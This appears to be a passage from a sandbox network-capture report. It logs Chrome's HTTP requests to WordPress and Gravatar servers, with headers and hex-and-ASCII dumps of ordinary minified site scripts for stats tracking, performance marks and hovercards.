                                                                                                                                                                                                                                                Data Ascii: ion(){if(window.PerformanceMeasure&&window.PerformanceMark){Mn=s("customMeasuresPrefixes"),yn=s("customMarksPrefixes"),Mn.push("bilmur_"),yn.push("bilmur_");var n=Cn;try{gn=pn("mark",n),bn=pn("measure",n)}catch(n){Sn()}}}()}function On(){S=!1,D=!1,x=!1,on
                                                                                                                                                                                                                                                2024-12-20 15:45:36 UTC112INData Raw: 6d 65 6e 74 2e 70 72 65 72 65 6e 64 65 72 69 6e 67 29 26 26 28 22 6c 6f 61 64 69 6e 67 22 3d 3d 3d 64 6f 63 75 6d 65 6e 74 2e 72 65 61 64 79 53 74 61 74 65 3f 64 6f 63 75 6d 65 6e 74 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 44 4f 4d 43 6f 6e 74 65 6e 74 4c 6f 61 64 65 64 22 2c 46 6e 29 3a 46 6e 28 29 29 7d 28 29 3b 0a
                                                                                                                                                                                                                                                Data Ascii: ment.prerendering)&&("loading"===document.readyState?document.addEventListener("DOMContentLoaded",Fn):Fn())}();


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                18192.168.2.1149767192.0.77.324436716C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                2024-12-20 15:45:36 UTC399OUTGET /wp-content/mu-plugins/gravatar-hovercards/wpgroho.js?m=1610363240i HTTP/1.1
                                                                                                                                                                                                                                                Host: s2.wp.com
                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                Sec-Fetch-Site: none
                                                                                                                                                                                                                                                Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                2024-12-20 15:45:36 UTC480INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                                Date: Fri, 20 Dec 2024 15:45:36 GMT
                                                                                                                                                                                                                                                Content-Type: application/javascript
                                                                                                                                                                                                                                                Content-Length: 655
                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                x-minify: t
                                                                                                                                                                                                                                                x-minify-cache: hit
                                                                                                                                                                                                                                                etag: W/1125-1684465184641.707
                                                                                                                                                                                                                                                Expires: Fri, 30 May 2025 20:24:45 GMT
                                                                                                                                                                                                                                                Cache-Control: max-age=31536000
                                                                                                                                                                                                                                                X-ac: 2.jfk _dfw BYPASS
                                                                                                                                                                                                                                                Access-Control-Allow-Methods: GET, HEAD
                                                                                                                                                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                Timing-Allow-Origin: *
                                                                                                                                                                                                                                                Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                X-nc: HIT jfk 2
                                                                                                                                                                                                                                                2024-12-20 15:45:36 UTC655INData Raw: 28 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 65 3d 77 69 6e 64 6f 77 2e 57 50 47 72 6f 48 6f 7c 7c 7b 7d 3b 65 2e 6d 79 5f 68 61 73 68 3d 22 22 3b 65 2e 64 61 74 61 3d 7b 7d 3b 65 2e 72 65 6e 64 65 72 65 72 73 3d 7b 7d 3b 65 2e 73 79 6e 63 50 72 6f 66 69 6c 65 44 61 74 61 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 72 29 7b 69 66 28 21 65 2e 64 61 74 61 5b 61 5d 29 7b 65 2e 64 61 74 61 5b 61 5d 3d 7b 7d 3b 76 61 72 20 6e 3d 64 6f 63 75 6d 65 6e 74 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 22 64 69 76 2e 67 72 6f 66 69 6c 65 2d 68 61 73 68 2d 6d 61 70 2d 22 2b 61 2b 22 20 73 70 61 6e 22 29 3b 66 6f 72 28 76 61 72 20 74 3d 30 3b 74 3c 6e 2e 6c 65 6e 67 74 68 3b 74 2b 2b 29 7b 76 61 72 20 6f 3d 6e 5b 74 5d 3b 65 2e 64 61 74 61 5b 61 5d 5b 6f 2e 63 6c
                                                                                                                                                                                                                                                Data Ascii: (function(){var e=window.WPGroHo||{};e.my_hash="";e.data={};e.renderers={};e.syncProfileData=function(a,r){if(!e.data[a]){e.data[a]={};var n=document.querySelectorAll("div.grofile-hash-map-"+a+" span");for(var t=0;t<n.length;t++){var o=n[t];e.data[a][o.cl


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                19192.168.2.1149768192.0.76.34436716C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                2024-12-20 15:45:36 UTC343OUTGET /w.js?67 HTTP/1.1
                                                                                                                                                                                                                                                Host: stats.wp.com
                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                Sec-Fetch-Site: none
                                                                                                                                                                                                                                                Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                2024-12-20 15:45:37 UTC433INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                                Date: Fri, 20 Dec 2024 15:45:36 GMT
                                                                                                                                                                                                                                                Content-Type: application/javascript
                                                                                                                                                                                                                                                Content-Length: 12788
                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                x-minify: t
                                                                                                                                                                                                                                                x-minify-cache: hit
                                                                                                                                                                                                                                                etag: W/12827-1705538370375.7896
                                                                                                                                                                                                                                                Expires: Fri, 17 Jan 2025 00:46:55 GMT
                                                                                                                                                                                                                                                Cache-Control: max-age=31536000
                                                                                                                                                                                                                                                Access-Control-Allow-Methods: GET, HEAD
                                                                                                                                                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                X-nc: HIT jfk
                                                                                                                                                                                                                                                Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                2024-12-20 15:45:37 UTC936INData Raw: 21 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 65 3d 7b 7d 3b 66 75 6e 63 74 69 6f 6e 20 6e 28 6f 29 7b 69 66 28 65 5b 6f 5d 29 72 65 74 75 72 6e 20 65 5b 6f 5d 2e 65 78 70 6f 72 74 73 3b 76 61 72 20 72 3d 65 5b 6f 5d 3d 7b 69 3a 6f 2c 6c 3a 21 31 2c 65 78 70 6f 72 74 73 3a 7b 7d 7d 3b 72 65 74 75 72 6e 20 74 5b 6f 5d 2e 63 61 6c 6c 28 72 2e 65 78 70 6f 72 74 73 2c 72 2c 72 2e 65 78 70 6f 72 74 73 2c 6e 29 2c 72 2e 6c 3d 21 30 2c 72 2e 65 78 70 6f 72 74 73 7d 6e 2e 6d 3d 74 2c 6e 2e 63 3d 65 2c 6e 2e 64 3d 66 75 6e 63 74 69 6f 6e 28 74 2c 65 2c 6f 29 7b 6e 2e 6f 28 74 2c 65 29 7c 7c 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 79 28 74 2c 65 2c 7b 65 6e 75 6d 65 72 61 62 6c 65 3a 21 30 2c 67 65 74 3a 6f 7d 29 7d 2c 6e 2e 72 3d 66 75 6e
                                                                                                                                                                                                                                                Data Ascii: !function(t){var e={};function n(o){if(e[o])return e[o].exports;var r=e[o]={i:o,l:!1,exports:{}};return t[o].call(r.exports,r,r.exports,n),r.l=!0,r.exports}n.m=t,n.c=e,n.d=function(t,e,o){n.o(t,e)||Object.defineProperty(t,e,{enumerable:!0,get:o})},n.r=fun
                                                                                                                                                                                                                                                2024-12-20 15:45:37 UTC1369INData Raw: 20 6e 28 65 29 7b 72 65 74 75 72 6e 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 53 79 6d 62 6f 6c 26 26 22 73 79 6d 62 6f 6c 22 3d 3d 74 79 70 65 6f 66 20 53 79 6d 62 6f 6c 2e 69 74 65 72 61 74 6f 72 3f 74 2e 65 78 70 6f 72 74 73 3d 6e 3d 66 75 6e 63 74 69 6f 6e 28 74 29 7b 72 65 74 75 72 6e 20 74 79 70 65 6f 66 20 74 7d 3a 74 2e 65 78 70 6f 72 74 73 3d 6e 3d 66 75 6e 63 74 69 6f 6e 28 74 29 7b 72 65 74 75 72 6e 20 74 26 26 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 53 79 6d 62 6f 6c 26 26 74 2e 63 6f 6e 73 74 72 75 63 74 6f 72 3d 3d 3d 53 79 6d 62 6f 6c 26 26 74 21 3d 3d 53 79 6d 62 6f 6c 2e 70 72 6f 74 6f 74 79 70 65 3f 22 73 79 6d 62 6f 6c 22 3a 74 79 70 65 6f 66 20 74 7d 2c 6e 28 65 29 7d 74 2e 65 78 70 6f 72 74 73 3d 6e 7d
                                                                                                                                                                                                                                                Data Ascii: n(e){return"function"==typeof Symbol&&"symbol"==typeof Symbol.iterator?t.exports=n=function(t){return typeof t}:t.exports=n=function(t){return t&&"function"==typeof Symbol&&t.constructor===Symbol&&t!==Symbol.prototype?"symbol":typeof t},n(e)}t.exports=n}
                                                                                                                                                                                                                                                2024-12-20 15:45:37 UTC1369INData Raw: 75 72 6e 20 64 65 63 6f 64 65 55 52 49 43 6f 6d 70 6f 6e 65 6e 74 28 6f 5b 72 5d 2e 73 75 62 73 74 72 69 6e 67 28 6e 29 29 3b 72 65 74 75 72 6e 20 6e 75 6c 6c 7d 7d 2c 66 75 6e 63 74 69 6f 6e 28 74 2c 65 2c 6e 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 6e 2e 64 28 65 2c 22 61 22 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 54 7d 29 3b 76 61 72 20 6f 3d 6e 28 30 29 2c 72 3d 6e 2e 6e 28 6f 29 2c 69 3d 6e 28 31 29 3b 66 75 6e 63 74 69 6f 6e 20 61 28 74 29 7b 76 61 72 20 65 3d 5b 5d 3b 69 66 28 77 69 6e 64 6f 77 2e 63 72 79 70 74 6f 26 26 77 69 6e 64 6f 77 2e 63 72 79 70 74 6f 2e 67 65 74 52 61 6e 64 6f 6d 56 61 6c 75 65 73 29 65 3d 6e 65 77 20 55 69 6e 74 38 41 72 72 61 79 28 74 29 2c 77 69 6e 64 6f 77 2e 63 72 79 70 74 6f 2e 67 65 74 52 61 6e
                                                                                                                                                                                                                                                Data Ascii: urn decodeURIComponent(o[r].substring(n));return null}},function(t,e,n){"use strict";n.d(e,"a",function(){return T});var o=n(0),r=n.n(o),i=n(1);function a(t){var e=[];if(window.crypto&&window.crypto.getRandomValues)e=new Uint8Array(t),window.crypto.getRan
                                                                                                                                                                                                                                                2024-12-20 15:45:37 UTC1369INData Raw: 6f 6e 20 74 28 65 2c 6e 29 7b 69 66 28 6e 75 6c 6c 3d 3d 65 7c 7c 22 6f 62 6a 65 63 74 22 21 3d 3d 72 28 29 28 65 29 29 72 65 74 75 72 6e 20 65 3b 66 6f 72 28 76 61 72 20 6f 20 69 6e 20 6e 75 6c 6c 21 3d 6e 26 26 22 6f 62 6a 65 63 74 22 3d 3d 3d 72 28 29 28 6e 29 7c 7c 28 6e 3d 65 2e 63 6f 6e 73 74 72 75 63 74 6f 72 28 29 29 2c 65 29 65 2e 68 61 73 4f 77 6e 50 72 6f 70 65 72 74 79 28 6f 29 26 26 28 6e 5b 6f 5d 3d 74 28 65 5b 6f 5d 29 29 3b 72 65 74 75 72 6e 20 6e 7d 28 6c 2c 74 29 2c 79 28 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 65 3d 5b 5d 3b 66 6f 72 28 76 61 72 20 6e 20 69 6e 20 74 29 74 2e 68 61 73 4f 77 6e 50 72 6f 70 65 72 74 79 28 6e 29 26 26 65 2e 70 75 73 68 28 65 6e 63 6f 64 65 55 52 49 43 6f 6d 70 6f 6e 65 6e 74 28 6e 29 2b 22 3d 22 2b
                                                                                                                                                                                                                                                Data Ascii: on t(e,n){if(null==e||"object"!==r()(e))return e;for(var o in null!=n&&"object"===r()(n)||(n=e.constructor()),e)e.hasOwnProperty(o)&&(n[o]=t(e[o]));return n}(l,t),y(function(t){var e=[];for(var n in t)t.hasOwnProperty(n)&&e.push(encodeURIComponent(n)+"="+
                                                                                                                                                                                                                                                2024-12-20 15:45:37 UTC1369INData Raw: 3d 22 2b 28 6e 65 77 20 44 61 74 65 29 2e 67 65 74 54 69 6d 65 28 29 2b 22 26 5f 3d 5f 22 2c 6e 2e 61 6c 74 3d 22 22 7d 7d 2c 67 3d 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 65 2c 6e 3d 53 28 29 3b 66 6f 72 28 65 3d 30 3b 65 3c 6e 2e 6c 65 6e 67 74 68 3b 2b 2b 65 29 69 66 28 74 3d 3d 6e 5b 65 5d 29 72 65 74 75 72 6e 3b 6e 2e 70 75 73 68 28 74 29 2c 62 28 6e 29 7d 2c 62 3d 66 75 6e 63 74 69 6f 6e 28 74 29 7b 66 6f 72 28 3b 74 2e 6a 6f 69 6e 28 22 20 22 29 2e 6c 65 6e 67 74 68 3e 32 30 34 38 3b 29 74 3d 74 2e 73 6c 69 63 65 28 31 29 3b 6b 28 22 71 73 22 2c 74 2e 6a 6f 69 6e 28 22 20 22 29 2c 31 38 30 30 29 7d 2c 5f 3d 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 65 2c 6e 3d 5b 5d 2c 6f 3d 53 28 29 3b 66 6f 72 28 65 3d 30 3b 65 3c 6f 2e 6c 65 6e 67
                                                                                                                                                                                                                                                Data Ascii: ="+(new Date).getTime()+"&_=_",n.alt=""}},g=function(t){var e,n=S();for(e=0;e<n.length;++e)if(t==n[e])return;n.push(t),b(n)},b=function(t){for(;t.join(" ").length>2048;)t=t.slice(1);k("qs",t.join(" "),1800)},_=function(t){var e,n=[],o=S();for(e=0;e<o.leng
                                                                                                                                                                                                                                                2024-12-20 15:45:37 UTC1369INData Raw: 70 22 2c 65 2e 6a 6f 69 6e 28 22 2c 22 29 29 2c 68 28 7b 5f 65 6e 3a 22 5f 61 6c 69 61 73 55 73 65 72 47 65 6e 65 72 61 6c 22 2c 6e 65 78 74 75 73 65 72 69 64 3a 74 2c 6e 65 78 74 75 73 65 72 69 64 74 79 70 65 3a 22 61 6e 6f 6e 22 2c 70 72 65 76 75 73 65 72 69 64 3a 63 2c 70 72 65 76 75 73 65 72 69 64 74 79 70 65 3a 22 61 6e 6f 6e 22 7d 29 29 7d 6b 28 22 61 69 22 2c 74 29 2c 63 3d 74 2c 75 3d 22 61 6e 6f 6e 22 7d 65 6c 73 65 20 68 28 7b 5f 65 6e 3a 22 5f 61 6c 69 61 73 55 73 65 72 22 2c 61 6e 6f 6e 49 64 3a 74 7d 29 7d 2c 72 65 63 6f 72 64 45 76 65 6e 74 3a 66 75 6e 63 74 69 6f 6e 28 74 2c 65 2c 6e 29 7b 22 5f 73 65 74 50 72 6f 70 65 72 74 69 65 73 22 21 3d 3d 74 26 26 28 28 65 3d 65 7c 7c 7b 7d 29 2e 5f 65 6e 3d 74 2c 22 73 74 72 69 6e 67 22 3d 3d 74 79
                                                                                                                                                                                                                                                Data Ascii: p",e.join(",")),h({_en:"_aliasUserGeneral",nextuserid:t,nextuseridtype:"anon",prevuserid:c,prevuseridtype:"anon"}))}k("ai",t),c=t,u="anon"}else h({_en:"_aliasUser",anonId:t})},recordEvent:function(t,e,n){"_setProperties"!==t&&((e=e||{})._en=t,"string"==ty
                                                                                                                                                                                                                                                2024-12-20 15:45:37 UTC1369INData Raw: 74 72 69 6e 67 2e 63 61 6c 6c 28 74 29 2e 73 6c 69 63 65 28 38 2c 2d 31 29 3b 72 65 74 75 72 6e 22 4f 62 6a 65 63 74 22 3d 3d 3d 6e 26 26 74 2e 63 6f 6e 73 74 72 75 63 74 6f 72 26 26 28 6e 3d 74 2e 63 6f 6e 73 74 72 75 63 74 6f 72 2e 6e 61 6d 65 29 2c 22 4d 61 70 22 3d 3d 3d 6e 7c 7c 22 53 65 74 22 3d 3d 3d 6e 3f 41 72 72 61 79 2e 66 72 6f 6d 28 6e 29 3a 22 41 72 67 75 6d 65 6e 74 73 22 3d 3d 3d 6e 7c 7c 2f 5e 28 3f 3a 55 69 7c 49 29 6e 74 28 3f 3a 38 7c 31 36 7c 33 32 29 28 3f 3a 43 6c 61 6d 70 65 64 29 3f 41 72 72 61 79 24 2f 2e 74 65 73 74 28 6e 29 3f 6f 28 74 2c 65 29 3a 76 6f 69 64 20 30 7d 7d 7d 2c 66 75 6e 63 74 69 6f 6e 28 74 2c 65 29 7b 74 2e 65 78 70 6f 72 74 73 3d 66 75 6e 63 74 69 6f 6e 28 74 2c 65 29 7b 28 6e 75 6c 6c 3d 3d 65 7c 7c 65 3e 74
                                                                                                                                                                                                                                                Data Ascii: tring.call(t).slice(8,-1);return"Object"===n&&t.constructor&&(n=t.constructor.name),"Map"===n||"Set"===n?Array.from(n):"Arguments"===n||/^(?:Ui|I)nt(?:8|16|32)(?:Clamped)?Array$/.test(n)?o(t,e):void 0}}},function(t,e){t.exports=function(t,e){(null==e||e>t
                                                                                                                                                                                                                                                2024-12-20 15:45:37 UTC1369INData Raw: 66 28 22 6f 62 6a 65 63 74 22 21 3d 3d 61 28 29 28 6e 2e 70 61 72 65 6e 74 4e 6f 64 65 29 29 72 65 74 75 72 6e 3b 6e 3d 6e 2e 70 61 72 65 6e 74 4e 6f 64 65 7d 69 66 28 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 65 3d 64 6f 63 75 6d 65 6e 74 2e 6c 6f 63 61 74 69 6f 6e 3b 69 66 28 65 2e 68 6f 73 74 3d 3d 3d 74 2e 68 6f 73 74 29 72 65 74 75 72 6e 21 30 3b 69 66 28 22 22 3d 3d 3d 74 2e 68 6f 73 74 29 72 65 74 75 72 6e 21 30 3b 69 66 28 65 2e 70 72 6f 74 6f 63 6f 6c 3d 3d 3d 74 2e 70 72 6f 74 6f 63 6f 6c 26 26 65 2e 68 6f 73 74 3d 3d 3d 74 2e 68 6f 73 74 6e 61 6d 65 29 7b 69 66 28 22 68 74 74 70 3a 22 3d 3d 3d 65 2e 70 72 6f 74 6f 63 6f 6c 26 26 65 2e 68 6f 73 74 2b 22 3a 38 30 22 3d 3d 3d 74 2e 68 6f 73 74 29 72 65 74 75 72 6e 21 30 3b 69 66 28 22 68 74
                                                                                                                                                                                                                                                Data Ascii: f("object"!==a()(n.parentNode))return;n=n.parentNode}if(function(t){var e=document.location;if(e.host===t.host)return!0;if(""===t.host)return!0;if(e.protocol===t.protocol&&e.host===t.hostname){if("http:"===e.protocol&&e.host+":80"===t.host)return!0;if("ht
                                                                                                                                                                                                                                                2024-12-20 15:45:37 UTC1369INData Raw: 63 6f 64 65 55 52 49 43 6f 6d 70 6f 6e 65 6e 74 28 74 5b 65 5d 29 29 3b 72 65 74 75 72 6e 20 6e 2e 6a 6f 69 6e 28 22 26 22 29 7d 2c 6c 3d 66 75 6e 63 74 69 6f 6e 28 74 2c 65 2c 6e 29 7b 76 61 72 20 6f 3d 6e 65 77 20 49 6d 61 67 65 3b 6f 2e 73 72 63 3d 64 6f 63 75 6d 65 6e 74 2e 6c 6f 63 61 74 69 6f 6e 2e 70 72 6f 74 6f 63 6f 6c 2b 22 2f 2f 70 69 78 65 6c 2e 77 70 2e 63 6f 6d 2f 22 2b 74 2b 22 3f 22 2b 65 2b 22 26 72 61 6e 64 3d 22 2b 4d 61 74 68 2e 72 61 6e 64 6f 6d 28 29 2c 6f 2e 61 6c 74 3d 22 22 2c 22 73 74 72 69 6e 67 22 3d 3d 74 79 70 65 6f 66 20 6e 26 26 64 6f 63 75 6d 65 6e 74 2e 62 6f 64 79 26 26 28 6f 2e 69 64 3d 6e 2c 70 28 6e 29 2c 64 6f 63 75 6d 65 6e 74 2e 62 6f 64 79 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 6f 29 29 7d 2c 70 3d 66 75 6e 63 74
                                                                                                                                                                                                                                                Data Ascii: codeURIComponent(t[e]));return n.join("&")},l=function(t,e,n){var o=new Image;o.src=document.location.protocol+"//pixel.wp.com/"+t+"?"+e+"&rand="+Math.random(),o.alt="","string"==typeof n&&document.body&&(o.id=n,p(n),document.body.appendChild(o))},p=funct
                                                                                                                                                                                                                                                2024-12-20 15:45:37 UTC900INData Raw: 2e 67 69 66 22 2c 66 28 74 29 2c 22 77 70 73 74 61 74 73 22 29 7d 2c 65 78 74 72 61 3a 66 75 6e 63 74 69 6f 6e 28 74 29 7b 74 2e 76 3d 22 77 70 63 6f 6d 2d 6e 6f 2d 70 76 22 2c 6c 28 22 67 2e 67 69 66 22 2c 66 28 74 29 2c 21 31 29 7d 2c 72 61 77 3a 66 75 6e 63 74 69 6f 6e 28 74 29 7b 6c 28 22 67 2e 67 69 66 22 2c 66 28 74 29 2c 21 31 29 7d 2c 63 6c 69 63 6b 3a 66 75 6e 63 74 69 6f 6e 28 74 29 7b 6c 28 22 63 2e 67 69 66 22 2c 66 28 74 29 2c 21 31 29 7d 2c 63 6c 69 63 6b 54 72 61 63 6b 65 72 49 6e 69 74 3a 66 75 6e 63 74 69 6f 6e 28 74 2c 65 29 7b 64 2e 69 6e 69 74 28 74 2c 65 29 7d 7d 2c 79 3d 66 75 6e 63 74 69 6f 6e 20 74 28 29 7b 64 6f 63 75 6d 65 6e 74 2e 68 69 64 64 65 6e 7c 7c 28 64 6f 63 75 6d 65 6e 74 2e 72 65 6d 6f 76 65 45 76 65 6e 74 4c 69 73 74
                                                                                                                                                                                                                                                Data Ascii: .gif",f(t),"wpstats")},extra:function(t){t.v="wpcom-no-pv",l("g.gif",f(t),!1)},raw:function(t){l("g.gif",f(t),!1)},click:function(t){l("c.gif",f(t),!1)},clickTrackerInit:function(t,e){d.init(t,e)}},y=function t(){document.hidden||(document.removeEventList


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                20192.168.2.1149769192.0.73.24436716C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                2024-12-20 15:45:36 UTC444OUTGET /js/hovercards/hovercards.min.js?ver=202451b213a1cbb4e3271ca470eb7790af362ac2e18ce468f8945952c7bd3456d2132e HTTP/1.1
                                                                                                                                                                                                                                                Host: 0.gravatar.com
                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                Sec-Fetch-Site: none
                                                                                                                                                                                                                                                Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                2024-12-20 15:45:37 UTC456INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                                Date: Fri, 20 Dec 2024 15:45:37 GMT
                                                                                                                                                                                                                                                Content-Type: application/javascript
                                                                                                                                                                                                                                                Content-Length: 20008
                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                Last-Modified: Fri, 29 Nov 2024 19:32:24 GMT
                                                                                                                                                                                                                                                ETag: "674a16c8-4e28"
                                                                                                                                                                                                                                                Strict-Transport-Security: max-age=31536000; includeSubdomains; preload
                                                                                                                                                                                                                                                Expires: Fri, 27 Dec 2024 15:45:37 GMT
                                                                                                                                                                                                                                                Cache-Control: max-age=604800
                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                X-nc: HIT jfk 2
                                                                                                                                                                                                                                                Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                2024-12-20 15:45:37 UTC913INData Raw: 21 66 75 6e 63 74 69 6f 6e 28 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 66 75 6e 63 74 69 6f 6e 20 74 28 72 29 7b 72 65 74 75 72 6e 20 74 3d 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 53 79 6d 62 6f 6c 26 26 22 73 79 6d 62 6f 6c 22 3d 3d 74 79 70 65 6f 66 20 53 79 6d 62 6f 6c 2e 69 74 65 72 61 74 6f 72 3f 66 75 6e 63 74 69 6f 6e 28 74 29 7b 72 65 74 75 72 6e 20 74 79 70 65 6f 66 20 74 7d 3a 66 75 6e 63 74 69 6f 6e 28 74 29 7b 72 65 74 75 72 6e 20 74 26 26 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 53 79 6d 62 6f 6c 26 26 74 2e 63 6f 6e 73 74 72 75 63 74 6f 72 3d 3d 3d 53 79 6d 62 6f 6c 26 26 74 21 3d 3d 53 79 6d 62 6f 6c 2e 70 72 6f 74 6f 74 79 70 65 3f 22 73 79 6d 62 6f 6c 22 3a 74 79 70 65 6f 66 20 74 7d 2c 74 28 72 29 7d
                                                                                                                                                                                                                                                Data Ascii: !function(){"use strict";function t(r){return t="function"==typeof Symbol&&"symbol"==typeof Symbol.iterator?function(t){return typeof t}:function(t){return t&&"function"==typeof Symbol&&t.constructor===Symbol&&t!==Symbol.prototype?"symbol":typeof t},t(r)}
                                                                                                                                                                                                                                                2024-12-20 15:45:37 UTC1369INData Raw: 6e 67 54 6f 70 22 2c 6c 65 66 74 3a 22 70 61 64 64 69 6e 67 52 69 67 68 74 22 2c 72 69 67 68 74 3a 22 70 61 64 64 69 6e 67 4c 65 66 74 22 7d 3b 66 75 6e 63 74 69 6f 6e 20 63 28 74 2c 72 2c 61 29 7b 76 61 72 20 6e 3d 76 6f 69 64 20 30 3d 3d 3d 61 3f 7b 7d 3a 61 2c 65 3d 6e 2e 70 6c 61 63 65 6d 65 6e 74 2c 6f 3d 76 6f 69 64 20 30 3d 3d 3d 65 3f 22 72 69 67 68 74 2d 73 74 61 72 74 22 3a 65 2c 63 3d 6e 2e 6f 66 66 73 65 74 2c 76 3d 76 6f 69 64 20 30 3d 3d 3d 63 3f 30 3a 63 2c 73 3d 6e 2e 61 75 74 6f 46 6c 69 70 2c 64 3d 76 6f 69 64 20 30 3d 3d 3d 73 7c 7c 73 2c 6c 3d 6e 2e 61 75 74 6f 53 68 69 66 74 2c 68 3d 76 6f 69 64 20 30 3d 3d 3d 6c 7c 7c 6c 3b 72 2e 73 74 79 6c 65 2e 70 61 64 64 69 6e 67 3d 22 30 22 3b 76 61 72 20 75 3d 74 2e 67 65 74 42 6f 75 6e 64 69
                                                                                                                                                                                                                                                Data Ascii: ngTop",left:"paddingRight",right:"paddingLeft"};function c(t,r,a){var n=void 0===a?{}:a,e=n.placement,o=void 0===e?"right-start":e,c=n.offset,v=void 0===c?0:c,s=n.autoFlip,d=void 0===s||s,l=n.autoShift,h=void 0===l||l;r.style.padding="0";var u=t.getBoundi
                                                                                                                                                                                                                                                2024-12-20 15:45:37 UTC1369INData Raw: 3b 22 2c 22 27 22 3a 22 26 23 33 39 3b 22 2c 22 60 22 3a 22 26 23 78 36 30 3b 22 7d 3b 72 65 74 75 72 6e 20 74 2e 72 65 70 6c 61 63 65 28 2f 26 28 61 6d 70 7c 6c 74 7c 67 74 7c 71 75 6f 74 7c 23 33 39 7c 78 36 30 29 3b 7c 5b 5c 26 3c 3e 22 27 60 5d 2f 67 2c 28 66 75 6e 63 74 69 6f 6e 28 74 29 7b 72 65 74 75 72 6e 22 26 22 3d 3d 3d 74 5b 30 5d 3f 74 3a 72 5b 74 5d 7d 29 29 7d 66 75 6e 63 74 69 6f 6e 20 73 28 74 29 7b 72 65 74 75 72 6e 20 65 6e 63 6f 64 65 55 52 49 28 74 29 7d 66 75 6e 63 74 69 6f 6e 20 64 28 74 2c 72 2c 61 29 7b 76 61 72 20 6e 3d 74 2e 73 70 6c 69 74 28 22 3f 22 29 2c 65 3d 6e 5b 30 5d 2c 6f 3d 6e 5b 31 5d 2c 69 3d 6e 65 77 20 55 52 4c 53 65 61 72 63 68 50 61 72 61 6d 73 28 6f 7c 7c 22 22 29 3b 72 65 74 75 72 6e 20 69 2e 73 65 74 28 72 2c
